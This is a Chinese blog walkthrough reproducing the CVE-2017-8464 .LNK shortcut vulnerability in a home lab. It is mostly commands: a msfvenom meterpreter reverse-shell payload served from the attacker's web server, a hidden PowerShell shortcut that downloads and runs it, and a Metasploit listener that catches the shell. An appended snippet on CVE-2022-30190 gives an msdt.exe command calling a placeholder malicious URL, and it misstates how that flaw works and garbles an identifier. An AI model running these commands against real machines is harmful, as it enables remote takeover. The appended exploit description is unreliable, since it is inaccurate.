CVE-2017-8464远程命令执行漏洞复现

CVE-2017-8464远程命令执行漏洞复现

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。

注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

漏洞复现:

利用原理:创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。

环境搭建:

攻击机:Kali-Linux-2021.1-vm-amd64 IP:192.168.120.133

靶机:Windows 7 IP:192.168.120.128

复现过程:

kali下生成一个反弹的ps1的shell:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.120.133 lport=5555 -f psh-reflection > /opt/search.ps1
结果如图1.1所示。
image-20211227202537542
切换到opt目录,然后查看到已生成了search.ps1 的powershell 后门
image-20211227202555041
将生成的search.ps1拷贝到/var/www/html目录下
image-20211227202610932
启动apache服务
image-20211227202620553
访问web下的search.ps1,可以直接访问:
image-20211227202828166
在靶机上创建一个powershell远程快捷:

powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.120.133/search.ps1’);test.ps1”
image-20211227203313555
名称为:powershell.exe
image-20211227203330549
kali下创建监听反弹,并且可以看到成功反弹出靶机的shell:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options

image-20211229104458697

set LHOST 192.168.120.133
set LPORT 5555

image-20211229104359002

exploit 开始监听
在靶机上运行新建的powershell快捷方式,即可反弹shell,结果如下图所示。

image-20211229104419312

查看靶机ip:ipconfig

image-20211229105458342

输入shell进入win7shell,使用chcp 65001改变编码格式

image-20211229104925403

使用pwd,getlwd,getuid进行信息收集

image-20211229104738381

个人复现,欢迎交流学习,有问题希望及时指正。

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苏同学的安全屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值